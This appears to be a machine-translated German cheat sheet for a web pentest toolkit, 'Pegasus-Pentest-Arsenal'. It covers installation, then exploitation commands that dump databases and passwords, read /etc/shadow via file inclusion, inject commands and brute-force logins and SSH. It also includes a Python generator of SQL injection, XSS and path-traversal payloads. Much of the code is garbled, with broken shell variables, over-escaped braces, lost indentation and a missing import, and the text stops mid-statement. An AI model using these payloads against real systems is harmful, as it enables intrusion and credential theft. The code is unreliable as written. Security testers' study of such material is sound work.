Pegasus-Pentest-Arsenal Cheat Sheet¶
Überblick¶
Pegasus-Pentest-Arsenal ist ein umfassendes Web-Sicherheitstest-Toolkit, um verschiedene Aspekte der Web-Anwendung Penetration Tests zu optimieren und zu automatisieren. Entwickelt als All-in-one-Lösung für Sicherheitsexperten, kombiniert dieser Arsenal mehrere Sicherheitstest-Tools und Methoden in eine einheitliche Plattform, die den Prozess der Identifizierung und Nutzung von Web-Anwendung Schwachstellen vereinfacht. Das Toolkit ist besonders wertvoll für Penetrationsprüfer, die Webanwendungen schnell über verschiedene Technologien und Frameworks bewerten müssen.
Das Arsenal zeichnet sich durch seine modulare Architektur und umfangreiche Automatisierungsfunktionen aus. Anstatt Sicherheitsexperten manuell zu konfigurieren und auszuführen Dutzende von verschiedenen Werkzeugen, Pegasus-Pentest-Arsenal bietet eine optimierte Schnittstelle, die verschiedene Sicherheitstests inszeniert. Die Plattform umfasst automatisierte Aufklärungs-, Verwundbarkeits-Scanning-, Ausbeutungsmodule und Reporting-Funktionen, sodass sie sowohl für schnelle Sicherheitsbewertungen als auch für umfassende Penetrationstests geeignet ist.
Das Toolkit enthält branchenübliche Sicherheitstestmethoden und integriert sich mit beliebten Sicherheitstools, um eine umfassende Erfassung von Web Application Attack Vektoren zu gewährleisten. Es unterstützt Tests für OWASP Top 10 Schwachstellen, fortgeschrittene Injektionsangriffe, Authentifizierungs-Bypasses, Sitzungsmanagement-Fehler und Geschäftslogik Schwachstellen. Die Automatisierungsfunktionen der Plattform verringern die Zeit, die für Routinetestaufgaben benötigt wird, und halten gleichzeitig die für professionelle Sicherheitsbewertungen erforderliche Durchlässigkeit bei.
Pegasus-Pentest-Arsenal ist sowohl mit Anfänger als auch mit erfahrenen Penetrationsprüfern konzipiert. Die Plattform bietet geführte Workflows für Anfänger und bietet erweiterte Anpassungsmöglichkeiten für erfahrene Profis. Die Reporting-Funktionen erzeugen professionelle Dokumentationen, die für die Bereitstellung von Kunden, Compliance-Anforderungen und interne Sicherheitsbewertungen geeignet sind.
Installation¶
Docker Installation (empfohlen)¶
```bash
Clone Pegasus-Pentest-Arsenal repository¶
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git cd pegasus-pentest-arsenal
Build Docker image¶
docker build -t pegasus-arsenal .
Run Pegasus Arsenal container¶
docker run -d -p 8080:8080 -p 8443:8443 --name pegasus-arsenal pegasus-arsenal
Run with persistent data¶
docker run -d -p 8080:8080 -p 8443:8443 \ -v pegasus_data:/app/data \ -v pegasus_reports:/app/reports \ --name pegasus-arsenal pegasus-arsenal
Access Pegasus Arsenal¶
Web interface: http://localhost:8080¶
HTTPS interface: https://localhost:8443¶
Stop container¶
docker stop pegasus-arsenal
Remove container¶
docker rm pegasus-arsenal ```_
Docker komponiert Installation¶
```yaml
Create docker-compose.yml¶
cat << 'EOF' > docker-compose.yml version: '3.8'
services: pegasus-arsenal: build: . container_name: pegasus-arsenal ports: - "8080: 8080" - "8443: 8443" - "1337: 1337" # Additional service port volumes: - pegasus_data: /app/data - pegasus_reports: /app/reports - pegasus_wordlists: /app/wordlists - ./custom_modules: /app/custom_modules environment: - PEGASUS_MODE=production - PEGASUS_DEBUG=false - PEGASUS_API_KEY=your_api_key_here restart: unless-stopped networks: - pegasus_network
pegasus-db: image: postgres:13 container_name: pegasus-db environment: - POSTGRES_DB=pegasus - POSTGRES_USER=pegasus - POSTGRES_PASSWORD=pegasus_password volumes: - pegasus_db_data: /var/lib/postgresql/data networks: - pegasus_network
volumes: pegasus_data: pegasus_reports: pegasus_wordlists: pegasus_db_data:
networks: pegasus_network: driver: bridge EOF
Start Pegasus Arsenal¶
docker-compose up -d
View logs¶
docker-compose logs -f pegasus-arsenal
Stop services¶
docker-compose down
Stop and remove volumes¶
docker-compose down -v ```_
Manuelle Installation auf Ubuntu/Debian¶
```bash
Update system¶
sudo apt update && sudo apt upgrade -y
Install dependencies¶
sudo apt install -y python3 python3-pip python3-venv git curl wget \ nmap sqlmap nikto dirb gobuster wfuzz hydra john \ metasploit-framework burpsuite zaproxy
Install Node.js and npm¶
curl -fsSL https://deb.nodesource.com/setup_16.x|sudo -E bash - sudo apt install -y nodejs
Clone repository¶
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git cd pegasus-pentest-arsenal
Create virtual environment¶
python3 -m venv venv source venv/bin/activate
Install Python dependencies¶
pip install -r requirements.txt
Install Node.js dependencies¶
npm install
Configure database¶
sudo apt install postgresql postgresql-contrib sudo -u postgres createdb pegasus sudo -u postgres createuser pegasus sudo -u postgres psql -c "ALTER USER pegasus PASSWORD 'pegasus_password';"
Initialize database¶
python3 manage.py migrate
Create superuser¶
python3 manage.py createsuperuser
Start Pegasus Arsenal¶
python3 manage.py runserver 0.0.0.0:8080 ```_
Installation auf CentOS/RHEL¶
```bash
Install EPEL repository¶
sudo yum install epel-release -y
Install dependencies¶
sudo yum groupinstall "Development Tools" -y sudo yum install python3 python3-pip git curl wget \ nmap sqlmap nikto dirb hydra john -y
Install additional security tools¶
sudo yum install snapd -y sudo systemctl enable --now snapd.socket sudo snap install burpsuite-community-edition
Clone and setup¶
git clone https://github.com/pegasus-arsenal/pegasus-pentest-arsenal.git cd pegasus-pentest-arsenal
Setup Python environment¶
python3 -m venv venv source venv/bin/activate pip install -r requirements.txt
Install PostgreSQL¶
sudo yum install postgresql postgresql-server postgresql-contrib -y sudo postgresql-setup initdb sudo systemctl start postgresql sudo systemctl enable postgresql
Configure database¶
sudo -u postgres createdb pegasus sudo -u postgres createuser pegasus sudo -u postgres psql -c "ALTER USER pegasus PASSWORD 'pegasus_password';"
Start application¶
python3 manage.py runserver 0.0.0.0:8080 ```_
Kubernetes Bereitstellung¶
```yaml
Create pegasus-deployment.yaml¶
cat << 'EOF' > pegasus-deployment.yaml apiVersion: apps/v1 kind: Deployment metadata: name: pegasus-arsenal labels: app: pegasus-arsenal spec: replicas: 2 selector: matchLabels: app: pegasus-arsenal template: metadata: labels: app: pegasus-arsenal spec: containers: - name: pegasus-arsenal image: pegasus-arsenal:latest ports: - containerPort: 8080 - containerPort: 8443 env: - name: PEGASUS_MODE value: "production" - name: DATABASE_URL value: "postgresql://pegasus:password@pegasus-db:5432/pegasus" volumeMounts: - name: pegasus-data mountPath: /app/data - name: pegasus-reports mountPath: /app/reports volumes: - name: pegasus-data persistentVolumeClaim: claimName: pegasus-data-pvc - name: pegasus-reports persistentVolumeClaim: claimName: pegasus-reports-pvc
apiVersion: v1 kind: Service metadata: name: pegasus-arsenal-service spec: selector: app: pegasus-arsenal ports: - name: http port: 8080 targetPort: 8080 - name: https port: 8443 targetPort: 8443 type: LoadBalancer
apiVersion: apps/v1 kind: Deployment metadata: name: pegasus-db spec: replicas: 1 selector: matchLabels: app: pegasus-db template: metadata: labels: app: pegasus-db spec: containers: - name: postgres image: postgres:13 env: - name: POSTGRES_DB value: "pegasus" - name: POSTGRES_USER value: "pegasus" - name: POSTGRES_PASSWORD value: "password" volumeMounts: - name: postgres-data mountPath: /var/lib/postgresql/data volumes: - name: postgres-data persistentVolumeClaim: claimName: postgres-data-pvc
apiVersion: v1 kind: Service metadata: name: pegasus-db spec: selector: app: pegasus-db ports: - port: 5432 targetPort: 5432 EOF
Deploy to Kubernetes¶
kubectl apply -f pegasus-deployment.yaml
Check deployment status¶
kubectl get pods kubectl get services
Access Pegasus Arsenal¶
kubectl port-forward service/pegasus-arsenal-service 8080: 8080 ```_
Erstkonfiguration¶
Erst-Zeit-Setup¶
```bash
Access Pegasus Arsenal web interface¶
Navigate to http://localhost:8080¶
Initial configuration wizard¶
1. Set admin credentials¶
2. Configure database connection¶
3. Set API keys for external services¶
4. Configure tool paths¶
5. Set up reporting preferences¶
Command-line configuration¶
python3 manage.py configure --interactive
Non-interactive configuration¶
python3 manage.py configure \ --admin-user admin \ --admin-password secure_password \ --database-url postgresql://pegasus:password@localhost:5432/pegasus \ --api-keys-file api_keys.json ```_
API Keys Konfiguration¶
```bash
Create API keys configuration file¶
cat << 'EOF' > api_keys.json \\{ "virustotal": "your_virustotal_api_key", "shodan": "your_shodan_api_key", "censys": "your_censys_api_key", "securitytrails": "your_securitytrails_api_key", "hunter": "your_hunter_api_key", "dehashed": "your_dehashed_api_key", "hibp": "your_hibp_api_key", "whoisxml": "your_whoisxml_api_key" \\} EOF
Load API keys¶
python3 manage.py load_api_keys --file api_keys.json
Test API connectivity¶
python3 manage.py test_apis
Update individual API key¶
python3 manage.py set_api_key --service virustotal --key your_new_key ```_
Werkzeugkonfiguration¶
```bash
Configure external tool paths¶
cat << 'EOF' > tool_config.json \\{ "nmap": "/usr/bin/nmap", "sqlmap": "/usr/bin/sqlmap", "nikto": "/usr/bin/nikto", "dirb": "/usr/bin/dirb", "gobuster": "/usr/bin/gobuster", "wfuzz": "/usr/bin/wfuzz", "hydra": "/usr/bin/hydra", "john": "/usr/bin/john", "hashcat": "/usr/bin/hashcat", "metasploit": "/usr/bin/msfconsole", "burpsuite": "/usr/bin/burpsuite", "zaproxy": "/usr/bin/zaproxy" \\} EOF
Load tool configuration¶
python3 manage.py configure_tools --file tool_config.json
Verify tool installation¶
python3 manage.py verify_tools
Update tool paths¶
python3 manage.py update_tool_path --tool nmap --path /opt/nmap/bin/nmap ```_
Kernmodule und Funktionen¶
Reconnaissance Modul¶
```bash
Passive reconnaissance¶
pegasus-cli recon passive --target example.com
Active reconnaissance¶
pegasus-cli recon active --target example.com --deep
Subdomain enumeration¶
pegasus-cli recon subdomains --target example.com \ --wordlist /app/wordlists/subdomains.txt \ --dns-bruteforce \ --certificate-transparency
Port scanning¶
pegasus-cli recon ports --target example.com \ --ports 1-65535 \ --service-detection \ --os-detection
Technology stack identification¶
pegasus-cli recon tech --target example.com \ --fingerprint-cms \ --identify-frameworks \ --detect-waf
OSINT gathering¶
pegasus-cli recon osint --target example.com \ --social-media \ --email-harvesting \ --leaked-credentials ```_
Schwachstelle Scanning Modul¶
```bash
Comprehensive vulnerability scan¶
pegasus-cli scan vuln --target http://example.com \ --scan-type comprehensive \ --include-owasp-top10
Specific vulnerability types¶
pegasus-cli scan vuln --target http://example.com \ --scan-types sqli,xss,csrf,lfi,rfi
Authenticated scanning¶
pegasus-cli scan vuln --target http://example.com \ --auth-type form \ --username admin \ --password password \ --login-url /login
API vulnerability scanning¶
pegasus-cli scan api --target http://api.example.com \ --swagger-url /swagger.json \ --test-authentication \ --test-authorization
SSL/TLS security assessment¶
pegasus-cli scan ssl --target example.com \ --check-certificates \ --test-ciphers \ --check-vulnerabilities
Web application firewall detection¶
pegasus-cli scan waf --target http://example.com \ --detection-methods all \ --bypass-attempts ```_
Exploitation Modul¶
```bash
SQL injection exploitation¶
pegasus-cli exploit sqli --target http://example.com/page.php?id=1 \ --technique union \ --dump-database \ --extract-passwords
Cross-site scripting exploitation¶
pegasus-cli exploit xss --target http://example.com/search \ --parameter q \ --payload-type reflected \ --generate-poc
File inclusion exploitation¶
pegasus-cli exploit lfi --target http://example.com/page.php?file=index \ --technique traversal \ --extract-files /etc/passwd,/etc/shadow
Command injection exploitation¶
pegasus-cli exploit cmdi --target http://example.com/ping.php \ --parameter host \ --technique blind \ --execute-commands
Authentication bypass¶
pegasus-cli exploit auth --target http://example.com/login \ --technique sqli \ --username-field user \ --password-field pass
Session hijacking¶
pegasus-cli exploit session --target http://example.com \ --technique prediction \ --cookie-name PHPSESSID ```_
Brute Force Modul¶
```bash
Login brute force¶
pegasus-cli bruteforce login --target http://example.com/login \ --username-list /app/wordlists/usernames.txt \ --password-list /app/wordlists/passwords.txt \ --threads 10
Directory brute force¶
pegasus-cli bruteforce dirs --target http://example.com \ --wordlist /app/wordlists/directories.txt \ --extensions php,asp,aspx,jsp \ --recursive
Subdomain brute force¶
pegasus-cli bruteforce subdomains --target example.com \ --wordlist /app/wordlists/subdomains.txt \ --resolver 8.8.8.8 \ --threads 50
Parameter brute force¶
pegasus-cli bruteforce params --target http://example.com/page.php \ --wordlist /app/wordlists/parameters.txt \ --method GET,POST
Hash cracking¶
pegasus-cli bruteforce hash --hash-file hashes.txt \ --hash-type md5 \ --wordlist /app/wordlists/rockyou.txt \ --rules best64
SSH brute force¶
pegasus-cli bruteforce ssh --target 192.168.1.100 \ --username-list users.txt \ --password-list passwords.txt \ --threads 5 ```_
Advanced Testing Techniques¶
Entwicklung der Nutzlast¶
```python
!/usr/bin/env python3¶
Custom payload generator for Pegasus Arsenal¶
import json import base64 from urllib.parse import quote
class PegasusPayloadGenerator: def init(self): self.payloads = \\{ 'sqli': [], 'xss': [], 'lfi': [], 'cmdi': [], 'xxe': [] \\}
def generate_sqli_payloads(self, target_db='mysql'):
"""Generate SQL injection payloads"""
base_payloads = [
"' OR '1'='1",
"' OR 1=1 --",
"' UNION SELECT null, version() --",
"' AND (SELECT COUNT(*) FROM information_schema.tables)>0 --"
]
if target_db == 'mysql':
base_payloads.extend([
"' UNION SELECT user(), database() --",
"' AND (SELECT SUBSTRING(@@version,1,1))='5' --"
])
elif target_db == 'postgresql':
base_payloads.extend([
"' UNION SELECT current_user, current_database() --",
"' AND (SELECT version()) LIKE '%PostgreSQL%' --"
])
self.payloads['sqli'] = base_payloads
return base_payloads
def generate_xss_payloads(self, context='html'):
"""Generate XSS payloads for different contexts"""
html_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"<iframe src=javascript:alert('XSS')>"
]
js_payloads = [
"';alert('XSS');//",
"\";alert('XSS');//",
"'-alert('XSS')-'",
"\"-alert('XSS')-\""
]
attr_payloads = [
"\" onmouseover=alert('XSS') \"",
"' onmouseover=alert('XSS') '",
"javascript:alert('XSS')"
]
if context == 'html':
self.payloads['xss'] = html_payloads
elif context == 'javascript':
self.payloads['xss'] = js_payloads
elif context == 'attribute':
self.payloads['xss'] = attr_payloads
else:
self.payloads['xss'] = html_payloads + js_payloads + attr_payloads
return self.payloads['xss']
def generate_lfi_payloads(self, os_type='linux'):
"""Generate Local File Inclusion payloads"""
linux_payloads = [
"../../../etc/passwd",
"....//....//....//etc/passwd",
"..%252f..%252f..%252fetc%252fpasswd",
"/etc/passwd%00",
"php://filter/convert.base64-encode/resource=../../../etc/passwd"
]
windows_payloads = [
"..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
"....\\\\....\\\\....\\\\windows\\\\win.ini",
"..%255c..%255c..%255cwindows%255cwin.ini",
"C:\\windows\\win.ini%00"
]
if os_type == 'linux':
self.payloads['lfi'] = linux_payloads
elif os_type == 'windows':
self.payloads['lfi'] = windows_payloads
else:
self.payloads['lfi'] = linux_payloads + windows_payloads
return self.payloads['lfi']
def encode_payloads(self, payloads, encoding='url'):
"""Encode payloads for bypass attempts"""
encoded = []
for payload in payloads:
if encoding == 'url':
encoded.append(quote(payload))
elif encoding == 'base64':
encoded.append(base64.b64encode(payload.encode()).decode())
elif encoding == 'html':
encoded.append(''.join(f'&#\\\\{ord(c)\\\\};' for c in payload))
return encoded
def export_payloads(self, filename='custom_payloads.json'):
"""Export payloads to JSON file"""
with open(filename, 'w') as f:
json.dump(self.payloads, f, indent=2)
print(f"Payloads exported to \\\\{filename\\\\}")
Usage example¶
if name == "main": generator = PegasusPayloadGenerator()
# Generate payloads
sqli_payloads = generator.generate_sqli_payloads('mysql')
xss_payloads = generator.generate_xss_payloads('html')
lfi_payloads = generator.generate_lfi_payloads('linux')
# Encode for bypass
encoded_sqli = generator.encode_payloads(sqli_payloads, 'url')
# Export all payloads
generator.export_payloads()
```_
Automatische Testing Workflows¶
```bash
!/bin/bash¶
Pegasus Arsenal automated testing workflow¶
TARGET="\(1" OUTPUT_DIR="pegasus_results_\)(date +%Y%m%d_%H%M%S)"
if [ -z "$TARGET" ]; then
echo "Usage: $0
echo "[*] Starting Pegasus Arsenal automated testing for \(TARGET" mkdir -p "\)OUTPUT_DIR"
Phase 1: Reconnaissance¶
echo "[*] Phase 1: Reconnaissance" pegasus-cli recon passive --target "\(TARGET" --output "\)OUTPUT_DIR/recon_passive.json" pegasus-cli recon active --target "\(TARGET" --output "\)OUTPUT_DIR/recon_active.json" pegasus-cli recon subdomains --target "\(TARGET" --output "\)OUTPUT_DIR/subdomains.json"
Phase 2: Port Scanning¶
echo "[*] Phase 2: Port Scanning" pegasus-cli recon ports --target "\(TARGET" --ports 1-65535 --output "\)OUTPUT_DIR/ports.json"
Phase 3: Technology Detection¶
echo "[*] Phase 3: Technology Detection" pegasus-cli recon tech --target "\(TARGET" --output "\)OUTPUT_DIR/technology.json"
Phase 4: Vulnerability Scanning¶
echo "[*] Phase 4: Vulnerability Scanning" pegasus-cli scan vuln --target "http://\(TARGET" --scan-type comprehensive --output "\)OUTPUT_DIR/vulnerabilities.json"
Phase 5: SSL/TLS Assessment¶
echo "[*] Phase 5: SSL/TLS Assessment" pegasus-cli scan ssl --target "\(TARGET" --output "\)OUTPUT_DIR/ssl_assessment.json"
Phase 6: Directory Brute Force¶
echo "[*] Phase 6: Directory Brute Force" pegasus-cli bruteforce dirs --target "http://\(TARGET" --output "\)OUTPUT_DIR/directories.json"
Phase 7: Exploitation (if vulnerabilities found)¶
echo "[*] Phase 7: Exploitation" if grep -q "sql_injection" "\(OUTPUT_DIR/vulnerabilities.json"; then pegasus-cli exploit sqli --target "http://\)TARGET" --auto-detect --output "$OUTPUT_DIR/sqli_exploitation.json" fi
if grep -q "xss" "\(OUTPUT_DIR/vulnerabilities.json"; then pegasus-cli exploit xss --target "http://\)TARGET" --auto-detect --output "$OUTPUT_DIR/xss_exploitation.json" fi
Phase 8: Report Generation¶
echo "[*] Phase 8: Report Generation" pegasus-cli report generate --input-dir "\(OUTPUT_DIR" --format html --output "\)OUTPUT_DIR/final_report.html" pegasus-cli report generate --input-dir "\(OUTPUT_DIR" --format pdf --output "\)OUTPUT_DIR/final_report.pdf"
echo "[] Testing complete. Results saved to $OUTPUT_DIR" echo "[] Open $OUTPUT_DIR/final_report.html to view the results" ```_
Personalentwicklung¶
```python
!/usr/bin/env python3¶
Custom Pegasus Arsenal module template¶
from pegasus.core.module import BaseModule from pegasus.core.logger import get_logger import requests import json
class CustomWebTestModule(BaseModule): """Custom web application testing module"""
def __init__(self):
super().__init__()
self.name = "Custom Web Test"
self.description = "Custom web application security testing module"
self.version = "1.0.0"
self.author = "Security Researcher"
self.logger = get_logger(__name__)
# Module options
self.options = \\\\{
'target': \\\\{
'description': 'Target URL',
'required': True,
'default': ''
\\\\},
'timeout': \\\\{
'description': 'Request timeout in seconds',
'required': False,
'default': 10
\\\\},
'user_agent': \\\\{
'description': 'Custom User-Agent string',
'required': False,
'default': 'Pegasus-Arsenal/1.0'
\\\\}
\\\\}
def validate_options(self):
"""Validate module options"""
if not self.options['target']['value']:
raise ValueError("Target URL is required")
if not self.options['target']['value'].startswith(('http://', 'https://')):
raise ValueError("Target must be a valid HTTP/HTTPS URL")
def run(self):
"""Execute the module"""
self.logger.info(f"Starting custom web test for \\\\{self.options['target']['value']\\\\}")
try:
self.validate_options()
# Custom testing logic
results = self.perform_custom_tests()
# Process and return results
return self.format_results(results)
except Exception as e:
self.logger.error(f"Module execution failed: \\\\{e\\\\}")
return \\\\{'error': str(e)\\\\}
def perform_custom_tests(self):
"""Perform custom security tests"""
target = self.options['target']['value']
timeout = int(self.options['timeout']['value'])
user_agent = self.options['user_agent']['value']
headers = \\\\{'User-Agent': user_agent\\\\}
results = \\\\{
'target': target,
'tests': []
\\\\}
# Test 1: Check for sensitive files
sensitive_files = [
'/robots.txt',
'/.htaccess',
'/web.config',
'/backup.sql',
'/config.php.bak'
]
for file_path in sensitive_files:
test_url = target.rstrip('/') + file_path
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
test_result = \\\\{
'test_name': 'Sensitive File Check',
'url': test_url,
'status_code': response.status_code,
'vulnerable': response.status_code == 200,
'details': f"File \\\\{file_path\\\\} accessible" if response.status_code == 200 else None
\\\\}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for \\\\{test_url\\\\}: \\\\{e\\\\}")
# Test 2: Check for common vulnerabilities
vuln_tests = [
\\\\{
'name': 'XSS Test',
'payload': '<script>alert("XSS")</script>',
'parameter': 'q'
\\\\},
\\\\{
'name': 'SQL Injection Test',
'payload': "' OR '1'='1",
'parameter': 'id'
\\\\}
]
for test in vuln_tests:
test_url = f"\\\\{target\\\\}?\\\\{test['parameter']\\\\}=\\\\{test['payload']\\\\}"
try:
response = requests.get(test_url, headers=headers, timeout=timeout)
vulnerable = test['payload'] in response.text
test_result = \\\\{
'test_name': test['name'],
'url': test_url,
'vulnerable': vulnerable,
'payload': test['payload'],
'details': f"Payload reflected in response" if vulnerable else None
\\\\}
results['tests'].append(test_result)
except requests.RequestException as e:
self.logger.warning(f"Request failed for \\\\{test_url\\\\}: \\\\{e\\\\}")
return results
def format_results(self, results):
"""Format results for output"""
formatted = \\\\{
'module': self.name,
'target': results['target'],
'timestamp': self.get_timestamp(),
'summary': \\\\{
'total_tests': len(results['tests']),
'vulnerabilities_found': sum(1 for test in results['tests'] if test.get('vulnerable', False))
\\\\},
'vulnerabilities': [test for test in results['tests'] if test.get('vulnerable', False)],
'all_tests': results['tests']
\\\\}
return formatted
Register module with Pegasus Arsenal¶
def register_module(): return CustomWebTestModule() ```_
Integration von Sicherheitswerkzeugen¶
Integration von Burp Suite¶
```python
!/usr/bin/env python3¶
Pegasus Arsenal - Burp Suite integration¶
import requests import json import base64
class PegasusBurpIntegration: def init(self, burp_api_url="http://localhost:1337", api_key=None): self.burp_api_url = burp_api_url self.api_key = api_key self.session = requests.Session()
if api_key:
self.session.headers.update(\\\\{'X-API-Key': api_key\\\\})
def start_scan(self, target_url, scan_type="crawl_and_audit"):
"""Start Burp Suite scan via API"""
scan_config = \\\\{
"scan_configurations": [
\\\\{
"name": scan_type,
"type": "NamedConfiguration"
\\\\}
],
"urls": [target_url]
\\\\}
response = self.session.post(
f"\\\\{self.burp_api_url\\\\}/v0.1/scan",
json=scan_config
)
if response.status_code == 201:
scan_id = response.headers.get('Location').split('/')[-1]
return scan_id
else:
raise Exception(f"Failed to start scan: \\\\{response.text\\\\}")
def get_scan_status(self, scan_id):
"""Get scan status"""
response = self.session.get(f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan status: \\\\{response.text\\\\}")
def get_scan_issues(self, scan_id):
"""Get scan issues/vulnerabilities"""
response = self.session.get(f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}/issues")
if response.status_code == 200:
return response.json()
else:
raise Exception(f"Failed to get scan issues: \\\\{response.text\\\\}")
def export_scan_report(self, scan_id, report_format="HTML"):
"""Export scan report"""
export_config = \\\\{
"scan_id": scan_id,
"report_type": report_format
\\\\}
response = self.session.post(
f"\\\\{self.burp_api_url\\\\}/v0.1/scan/\\\\{scan_id\\\\}/report",
json=export_config
)
if response.status_code == 200:
return response.content
else:
raise Exception(f"Failed to export report: \\\\{response.text\\\\}")
Integration with Pegasus Arsenal¶
def integrate_with_pegasus(target_url): """Integrate Burp Suite scan with Pegasus Arsenal""" burp = PegasusBurpIntegration()
# Start scan
scan_id = burp.start_scan(target_url)
print(f"Started Burp Suite scan: \\\\{scan_id\\\\}")
# Monitor scan progress
while True:
status = burp.get_scan_status(scan_id)
if status['scan_status'] == 'succeeded':
print("Scan completed successfully")
break
elif status['scan_status'] == 'failed':
print("Scan failed")
break
else:
print(f"Scan in progress: \\\\{status['scan_metrics']['crawl_requests_made']\\\\} requests made")
time.sleep(30)
# Get issues
issues = burp.get_scan_issues(scan_id)
# Export report
report = burp.export_scan_report(scan_id, "HTML")
with open(f"burp_report_\\\\{scan_id\\\\}.html", "wb") as f:
f.write(report)
return issues
```_
OWASP ZAP Integration¶
```python
!/usr/bin/env python3¶
Pegasus Arsenal - OWASP ZAP integration¶
from zapv2 import ZAPv2 import time import json
class PegasusZAPIntegration: def init(self, zap_proxy="http://localhost:8080"): self.zap = ZAPv2(proxies=\\{'http': zap_proxy, 'https': zap_proxy\\})
def spider_target(self, target_url):
"""Spider target application"""
print(f"Starting spider scan for \\\\{target_url\\\\}")
scan_id = self.zap.spider.scan(target_url)
# Wait for spider to complete
while int(self.zap.spider.status(scan_id)) < 100:
print(f"Spider progress: \\\\{self.zap.spider.status(scan_id)\\\\}%")
time.sleep(5)
print("Spider scan completed")
return self.zap.spider.results(scan_id)
def active_scan(self, target_url):
"""Perform active security scan"""
print(f"Starting active scan for \\\\{target_url\\\\}")
scan_id = self.zap.ascan.scan(target_url)
# Wait for active scan to complete
while int(self.zap.ascan.status(scan_id)) < 100:
print(f"Active scan progress: \\\\{self.zap.ascan.status(scan_id)\\\\}%")
time.sleep(10)
print("Active scan completed")
return scan_id
def get_alerts(self, baseurl=None):
"""Get security alerts"""
return self.zap.core.alerts(baseurl)
def generate_report(self, format_type="HTML"):
"""Generate security report"""
if format_type.upper() == "HTML":
return self.zap.core.htmlreport()
elif format_type.upper() == "XML":
return self.zap.core.xmlreport()
elif format_type.upper() == "JSON":
return self.zap.core.jsonreport()
else:
raise ValueError("Unsupported report format")
def comprehensive_scan(self, target_url):
"""Perform comprehensive security assessment"""
results = \\\\{
'target': target_url,
'spider_results': [],
'alerts': [],
'scan_summary': \\\\{\\\\}
\\\\}
# Spider the application
spider_results = self.spider_target(target_url)
results['spider_results'] = spider_results
# Perform active scan
scan_id = self.active_scan(target_url)
# Get alerts
alerts = self.get_alerts(target_url)
results['alerts'] = alerts
# Generate summary
results['scan_summary'] = \\\\{
'total_urls_found': len(spider_results),
'total_alerts': len(alerts),
'high_risk_alerts': len([a for a in alerts if a['risk'] == 'High']),
'medium_risk_alerts': len([a for a in alerts if a['risk'] == 'Medium']),
'low_risk_alerts': len([a for a in alerts if a['risk'] == 'Low'])
\\\\}
return results
Integration function¶
def run_zap_scan_for_pegasus(target_url): """Run ZAP scan and integrate with Pegasus Arsenal""" zap_integration = PegasusZAPIntegration()
# Perform comprehensive scan
results = zap_integration.comprehensive_scan(target_url)
# Generate reports
html_report = zap_integration.generate_report("HTML")
json_report = zap_integration.generate_report("JSON")
# Save reports
with open(f"zap_report_\\\\{target_url.replace('://', '_').replace('/', '_')\\\\}.html", "w") as f:
f.write(html_report)
with open(f"zap_results_\\\\{target_url.replace('://', '_').replace('/', '_')\\\\}.json", "w") as f:
f.write(json_report)
return results
```_
Reporting und Dokumentation¶
Automatisierte Report Generation¶
```python
!/usr/bin/env python3¶
Pegasus Arsenal automated report generator¶
import json import datetime from jinja2 import Template import pdfkit
class PegasusReportGenerator: def init(self): self.report_data = \\{\\} self.templates = \\{ 'executive_summary': self.get_executive_template(), 'technical_details': self.get_technical_template(), 'recommendations': self.get_recommendations_template() \\}
def load_scan_results(self, results_file):
"""Load scan results from JSON file"""
with open(results_file, 'r') as f:
self.report_data = json.load(f)
def generate_executive_summary(self):
"""Generate executive summary"""
template = Template(self.templates['executive_summary'])
# Calculate risk metrics
total_vulns = len(self.report_data.get('vulnerabilities', []))
high_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'High'])
medium_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'Medium'])
low_risk = len([v for v in self.report_data.get('vulnerabilities', []) if v.get('severity') == 'Low'])
summary_data = \\\\{
'target': self.report_data.get('target', 'Unknown'),
'scan_date': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
'total_vulnerabilities': total_vulns,
'high_risk_count': high_risk,
'medium_risk_count': medium_risk,
'low_risk_count': low_risk,
'risk_score': self.calculate_risk_score(high_risk, medium_risk, low_risk)
\\\\}
return template.render(**summary_data)
def generate_technical_details(self):
"""Generate technical details section"""
template = Template(self.templates['technical_details'])
return template.render(
vulnerabilities=self.report_data.get('vulnerabilities', []),
scan_details=self.report_data.get('scan_details', \\\\{\\\\}),
target_info=self.report_data.get('target_info', \\\\{\\\\})
)
def generate_recommendations(self):
"""Generate recommendations section"""
template = Template(self.templates['recommendations'])
# Generate recommendations based on vulnerabilities found
recommendations = self.generate_vuln_recommendations()
return template.render(recommendations=recommendations)
def generate_full_report(self, output_format='html'):
"""Generate complete security assessment report"""
report_sections = \\\\{
'executive_summary': self.generate_executive_summary(),
'technical_details': self.generate_technical_details(),
'recommendations': self.generate_recommendations()
\\\\}
full_report_template = """
<!DOCTYPE html>
<html>
<head>
<title>Pegasus Arsenal Security Assessment Report</title>
<style>
body \\\\{ font-family: Arial, sans-serif; margin: 40px; \\\\}
.header \\\\{ text-align: center; border-bottom: 2px solid #333; padding-bottom: 20px; \\\\}
.section \\\\{ margin: 30px 0; \\\\}
.vulnerability \\\\{ border: 1px solid #ddd; padding: 15px; margin: 10px 0; \\\\}
.high-risk \\\\{ border-left: 5px solid #d32f2f; \\\\}
.medium-risk \\\\{ border-left: 5px solid #f57c00; \\\\}
.low-risk \\\\{ border-left: 5px solid #388e3c; \\\\}
.recommendation \\\\{ background: #f5f5f5; padding: 15px; margin: 10px 0; \\\\}
</style>
</head>
<body>
<div class="header">
<h1>Security Assessment Report</h1>
<h2>Generated by Pegasus Arsenal</h2>
</div>
<div class="section">
<h2>Executive Summary</h2>
\\\\{\\\\{ executive_summary \\\\}\\\\}
</div>
<div class="section">
<h2>Technical Details</h2>
\\\\{\\\\{ technical_details \\\\}\\\\}
</div>
<div class="section">
<h2>Recommendations</h2>
\\\\{\\\\{ recommendations \\\\}\\\\}
</div>
</body>
</html>
"""
template = Template(full_report_template)
html_report = template.render(**report_sections)
if output_format.lower() == 'html':
return html_report
elif output_format.lower() == 'pdf':
return pdfkit.from_string(html_report, False)
else:
